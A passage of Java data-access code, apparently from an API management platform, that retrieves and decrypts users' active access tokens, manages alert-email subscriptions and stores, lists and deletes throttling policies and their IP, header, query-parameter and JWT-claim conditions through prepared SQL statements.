remove the domain name from the username. Using the UserCoreUtil. username = UserCoreUtil.removeDomainFromName(username); } try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKENS_OF_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACTIVE_TOKENS_OF_USER_SUFFIX; ps = conn.prepareStatement(sqlQuery); ps.setString(1, MultitenantUtils.getTenantAwareUsername(username)); ps.setInt(2, tenantId); ps.setString(3, userStoreDomain.toLowerCase()); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens of user " + username, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of user " + username, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } // public TokenGenerator getTokenGenerator() { // return tokenGenerator; // } private String getAccessTokenStoreTableNameOfUserId(String userId, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromUserId(userId); } return accessTokenStoreTable; } private String getAccessTokenStoreTableFromAccessToken(String accessToken, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); } return accessTokenStoreTable; } /** * This method will fetch all alerts type that is available in AM_ALERT_TYPES. * * @param stakeHolder the name of the stakeholder. whether its "subscriber", "publisher" or * "admin-dashboard" * @return List of alert types * @throws APIManagementException */ public HashMap<Integer, String> getAllAlertTypesByStakeHolder(String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, String> map = new HashMap<Integer, String>(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery; if (stakeHolder.equals("admin-dashboard")) { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES_FOR_ADMIN; ps = conn.prepareStatement(sqlQuery); } else { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES; ps = conn.prepareStatement(sqlQuery); ps.setString(1, stakeHolder); } resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getInt(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve alert types ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } /** * @param userName user name with tenant domain ex: [email protected] * @param stakeHolder value "p" for publisher value "s" for subscriber value "a" for admin * @return map of saved values of alert types. * @throws APIManagementException */ public List<Integer> getSavedAlertTypesIdsByUserNameAndStakeHolder(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> list = new ArrayList<Integer>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_TYPES_BY_USERNAME; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getInt(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will retrieve saved emails list by user name and stakeholder. * * @param userName user name. * @param stakeHolder "publisher" , "subscriber" or "admin-dashboard" * @return * @throws APIManagementException */ public List<String> retrieveSavedEmailList(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> list = new ArrayList<String>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_EMAILS; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getString(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will delete all email alert subscriptions details from tables * * @param userName * @param agent whether its publisher or store or admin dash board. */ public void unSubscribeAlerts(String userName, String agent) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { connection.setAutoCommit(false); String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); ps.executeUpdate(); String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); } connection.commit(); } catch (SQLException e) { handleException("Failed to delete alert email data.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * @param userName User name. * @param emailList Comma separated email list. * @param alertTypesIDList Comma separated alert types list. * @param stakeHolder if pram value = p we assume those changes from publisher if param value = s those data belongs to * subscriber. * @throws APIManagementException * @throws SQLException */ public void addAlertTypesConfigInfo(String userName, String emailList, String alertTypesIDList, String stakeHolder) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.executeUpdate(); if (!StringUtils.isEmpty(alertTypesIDList)) { List<String> alertTypeIdList = Arrays.asList(alertTypesIDList.split(",")); for (String alertTypeId : alertTypeIdList) { PreparedStatement psAlertTypeId = null; try { psAlertTypeId = connection.prepareStatement(alertTypesQuery); psAlertTypeId.setInt(1, Integer.parseInt(alertTypeId)); psAlertTypeId.setString(2, userName); psAlertTypeId.setString(3, stakeHolder); psAlertTypeId.execute(); } catch (SQLException e) { handleException("Error while adding alert types", e); } finally { APIMgtDBUtil.closeAllConnections(psAlertTypeId, null, null); } } } String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement extractedEmailListPs = null; try { extractedEmailListPs = connection.prepareStatement(saveEmailListDetailsQuery); extractedEmailListPs.setInt(1, emailListId); extractedEmailListPs.setString(2, email); extractedEmailListPs.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(extractedEmailListPs, null, null); } } } } else { String emailListSaveQuery = SQLConstants.ADD_ALERT_EMAIL_LIST; String dbProductName = connection.getMetaData().getDatabaseProductName(); ps = connection.prepareStatement(emailListSaveQuery, new String[]{DBUtils. getConvertedAutoGeneratedColumnName(dbProductName, "EMAIL_LIST_ID")}); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int generatedEmailIdList = rs.getInt(1); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement elseExtractedEmailListPS = null; try { elseExtractedEmailListPS = connection.prepareStatement(saveEmailListDetailsQuery); elseExtractedEmailListPS.setInt(1, generatedEmailIdList); elseExtractedEmailListPS.setString(2, email); elseExtractedEmailListPS.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(elseExtractedEmailListPS, null, null); } } } } } connection.commit(); } catch (SQLException e) { handleException("Failed to save alert preferences", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * Add a Application level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_APPLICATION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); if (hasCustomAttrib) { policyStatement.setBlob(12, new ByteArrayInputStream(policy.getCustomAttributes())); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Application Policy: " + policy.toString(), ex); } } handleException("Failed to add Application Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Add a Subscription level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setInt(12, policy.getRateLimitCount()); policyStatement.setString(13, policy.getRateLimitTimeUnit()); policyStatement.setBoolean(14, policy.isStopOnQuotaReach()); policyStatement.setString(15, policy.getBillingPlan()); if (hasCustomAttrib) { policyStatement.setBytes(16, policy.getCustomAttributes()); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Subscription Policy: " + policy.toString(), ex); } } handleException("Failed to add Subscription Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Wrapper method for {@link #addAPIPolicy(APIPolicy, Connection)} to add * API Policy without managing the database connection manually. * * @param policy policy object to add * @throws APIManagementException */ public APIPolicy addAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to add Api Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } return policy; } /** * Add a API level throttling policy to database. * <p> * If valid policy Id (not -1) is present in the <code>policy</code> object, * policy will be inserted with that policy Id. * Otherwise policy Id will be auto incremented. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void addAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_SQL; int policyId; try { String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.executeUpdate(); resultSet = policyStatement.getGeneratedKeys(); // Get the inserted POLICY_ID (auto incremented value) // Returns only single row if (resultSet.next()) { /* * H2 doesn't return generated keys when key is provided (not generated). Therefore policyId should be policy parameter's policyId when it is provided. */ policyId = resultSet.getInt(1); List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Update a API level throttling policy to database. * <p> * policy will be inserted with that policy Id. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void updateAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_WITH_ID_SQL; int policyId = policy.getPolicyId(); try { Statement st = conn.createStatement(); String driverName = conn.getMetaData().getDriverName(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY ON"); } String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.setBoolean(10, true); policyStatement.setInt(13, policyId); int updatedRawCount = policyStatement.executeUpdate(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY OFF"); } // Returns only single row if (updatedRawCount > 0) { List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Add throttling policy pipeline to database * * @param pipeline condition pipeline * @param policyID id of the policy to add pipeline * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addPipeline(Pipeline pipeline, int policyID, Connection conn) throws SQLException { PreparedStatement conditionStatement = null; ResultSet rs = null; try { String sqlAddQuery = SQLConstants.ThrottleSQLConstants.INSERT_CONDITION_GROUP_SQL; List<Condition> conditionList = pipeline.getConditions(); // Add data to the AM_CONDITION table String dbProductName = conn.getMetaData().getDatabaseProductName(); conditionStatement = conn.prepareStatement(sqlAddQuery, new String[]{DBUtils .getConvertedAutoGeneratedColumnName(dbProductName, "CONDITION_GROUP_ID")}); conditionStatement. setInt(1, policyID); conditionStatement.setString(2, pipeline.getQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(pipeline.getQuotaPolicy().getType())) { conditionStatement.setLong(3, ((RequestCountLimit) pipeline.getQuotaPolicy().getLimit()).getRequestCount()); conditionStatement.setString(4, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(pipeline.getQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) pipeline.getQuotaPolicy().getLimit(); conditionStatement.setLong(3, limit.getDataAmount()); conditionStatement.setString(4, limit.getDataUnit()); } conditionStatement.setLong(5, pipeline.getQuotaPolicy().getLimit().getUnitTime()); conditionStatement.setString(6, pipeline.getQuotaPolicy().getLimit().getTimeUnit()); conditionStatement.setString(7, pipeline.getDescription()); conditionStatement.executeUpdate(); rs = conditionStatement.getGeneratedKeys(); // Add Throttling parameters which have multiple entries if (rs != null && rs.next()) { int pipelineId = rs.getInt(1); // Get the inserted // CONDITION_GROUP_ID (auto // incremented value) pipeline.setId(pipelineId); for (Condition condition : conditionList) { if (condition == null) { continue; } String type = condition.getType(); if (PolicyConstants.IP_RANGE_TYPE.equals(type) || PolicyConstants.IP_SPECIFIC_TYPE.equals(type)) { IPCondition ipCondition = (IPCondition) condition; addIPCondition(ipCondition, pipelineId, conn); } if (PolicyConstants.HEADER_TYPE.equals(type)) { addHeaderCondition((HeaderCondition) condition, pipelineId, conn); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(type)) { addQueryParameterCondition((QueryParameterCondition) condition, pipelineId, conn); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(type)) { addJWTClaimsCondition((JWTClaimsCondition) condition, pipelineId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(conditionStatement, null, rs); } } /** * Add HEADER throttling condition to AM_HEADER_FIELD_CONDITION table * * @param headerCondition {@link HeaderCondition} with header fieled and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addHeaderCondition(HeaderCondition headerCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psHeaderCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_HEADER_FIELD_CONDITION_SQL; psHeaderCondition = conn.prepareStatement(sqlQuery); psHeaderCondition.setInt(1, pipelineId); psHeaderCondition.setString(2, headerCondition.getHeaderName()); psHeaderCondition.setString(3, headerCondition.getValue()); psHeaderCondition.setBoolean(4, headerCondition.isInvertCondition()); psHeaderCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psHeaderCondition, null, null); } } /** * Add QUERY throttling condition to AM_QUERY_PARAMETER_CONDITION table * * @param queryParameterCondition {@link QueryParameterCondition} with parameter name and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addQueryParameterCondition(QueryParameterCondition queryParameterCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psQueryParameterCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_QUERY_PARAMETER_CONDITION_SQL; psQueryParameterCondition = conn.prepareStatement(sqlQuery); psQueryParameterCondition.setInt(1, pipelineId); psQueryParameterCondition.setString(2, queryParameterCondition.getParameter()); psQueryParameterCondition.setString(3, queryParameterCondition.getValue()); psQueryParameterCondition.setBoolean(4, queryParameterCondition.isInvertCondition()); psQueryParameterCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psQueryParameterCondition, null, null); } } private void addIPCondition(IPCondition ipCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement statementIPCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_IP_CONDITION_SQL; statementIPCondition = conn.prepareStatement(sqlQuery); String startingIP = ipCondition.getStartingIP(); String endingIP = ipCondition.getEndingIP(); String specificIP = ipCondition.getSpecificIP(); statementIPCondition.setString(1, startingIP); statementIPCondition.setString(2, endingIP); statementIPCondition.setString(3, specificIP); statementIPCondition.setBoolean(4, ipCondition.isInvertCondition()); statementIPCondition.setInt(5, pipelineId); statementIPCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(statementIPCondition, null, null); } } /** * Add JWTCLAIMS throttling condition to AM_JWT_CLAIM_CONDITION table * * @param jwtClaimsCondition {@link JWTClaimsCondition} with claim url and claim attribute * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addJWTClaimsCondition(JWTClaimsCondition jwtClaimsCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psJWTClaimsCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_JWT_CLAIM_CONDITION_SQL; psJWTClaimsCondition = conn.prepareStatement(sqlQuery); psJWTClaimsCondition.setInt(1, pipelineId); psJWTClaimsCondition.setString(2, jwtClaimsCondition.getClaimUrl()); psJWTClaimsCondition.setString(3, jwtClaimsCondition.getAttribute()); psJWTClaimsCondition.setBoolean(4, jwtClaimsCondition.isInvertCondition()); psJWTClaimsCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psJWTClaimsCondition, null, null); } } /** * Add a Global level throttling policy to database * * @param policy Global Policy * @throws APIManagementException */ public void addGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_GLOBAL_POLICY_SQL; policyStatement = conn.prepareStatement(addQuery); policyStatement.setString(1, policy.getPolicyName()); policyStatement.setInt(2, policy.getTenantId()); policyStatement.setString(3, policy.getKeyTemplate()); policyStatement.setString(4, policy.getDescription()); InputStream siddhiQueryInputStream; byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); policyStatement.setBinaryStream(5, siddhiQueryInputStream, lengthOfBytes); policyStatement.setBoolean(6, false); policyStatement.setString(7, UUID.randomUUID().toString()); policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // rollback failed. exception will be thrown later for upper exception log.error("Failed to rollback the add Global Policy: " + policy.toString(), ex); } } handleException("Failed to add Global Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Retrieves global policy key templates for the given tenantID * * @param tenantID tenant id * @return list of KeyTemplates * @throws APIManagementException */ public List<String> getGlobalPolicyKeyTemplates(int tenantID) throws APIManagementException { List<String> keyTemplates = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATES; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { keyTemplates.add(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATES", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return keyTemplates; } /** * Returns true if the key template exist in DB * * @param policy Global Policy * @return true if key template already exists * @throws APIManagementException */ public boolean isKeyTemplatesExist(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATE; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, policy.getTenantId()); ps.setString(2, policy.getKeyTemplate()); ps.setString(3, policy.getPolicyName()); rs = ps.executeQuery(); if (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATE", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } /** * Removes a throttling policy from the database * * @param policyLevel level of the policy to be deleted * @param policyName name of the policy * @param tenantId used to get the tenant id * @throws APIManagementException */ public void removeThrottlePolicy(String policyLevel, String policyName, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement deleteStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.DELETE_APPLICATION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.DELETE_SUBSCRIPTION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.DELETE_GLOBAL_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteStatement = connection.prepareStatement(query); deleteStatement.setInt(1, tenantId); deleteStatement.setString(2, policyName); deleteStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Failed to remove policy " + policyLevel + '-' + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteStatement, connection, null); } } /** * Get API level policies. Result only contains basic details of the policy, * it doesn't contain pipeline information. * * @param tenantID policies are selected using tenantID * @return APIPolicy ArrayList * @throws APIManagementException */ public APIPolicy[] getAPIPolicies(int tenantID) throws APIManagementException { List<APIPolicy> policies = new ArrayList<APIPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { APIPolicy apiPolicy = new APIPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(apiPolicy, rs); apiPolicy.setUserLevel(rs.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policies.add(apiPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new APIPolicy[policies.size()]); } /** * Get application level polices * * @param tenantID polices are selected only belong to specific tenantID * @return AppilicationPolicy array list */ public ApplicationPolicy[] getApplicationPolicies(int tenantID) throws APIManagementException { List<ApplicationPolicy> policies = new ArrayList<ApplicationPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APP_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APP_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { ApplicationPolicy appPolicy = new ApplicationPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(appPolicy, rs); policies.add(appPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new ApplicationPolicy[policies.size()]); } /** * Get all subscription level policeis belongs to specific tenant * * @param tenantID tenantID filters the polices belongs to specific tenant * @return subscriptionPolicy array list */ public SubscriptionPolicy[] getSubscriptionPolicies(int tenantID) throws APIManagementException { List<SubscriptionPolicy> policies = new ArrayList<SubscriptionPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { SubscriptionPolicy subPolicy = new SubscriptionPolicy( rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(subPolicy, rs); subPolicy.setRateLimitCount(rs.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); subPolicy.setRateLimitTimeUnit(rs.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); subPolicy.setStopOnQuotaReach(rs.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); subPolicy.setBillingPlan(rs.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); subPolicy.setCustomAttributes(customAttrib); } policies.add(subPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new SubscriptionPolicy[policies.size()]); } /** * Get all Global level policeis belongs to specific tenant * * @param tenantID * @return * @throws APIManagementException */ public GlobalPolicy[] getGlobalPolicies(int tenantID) throws APIManagementException { List<GlobalPolicy> policies = new ArrayList<GlobalPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { String siddhiQuery = null; GlobalPolicy globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); 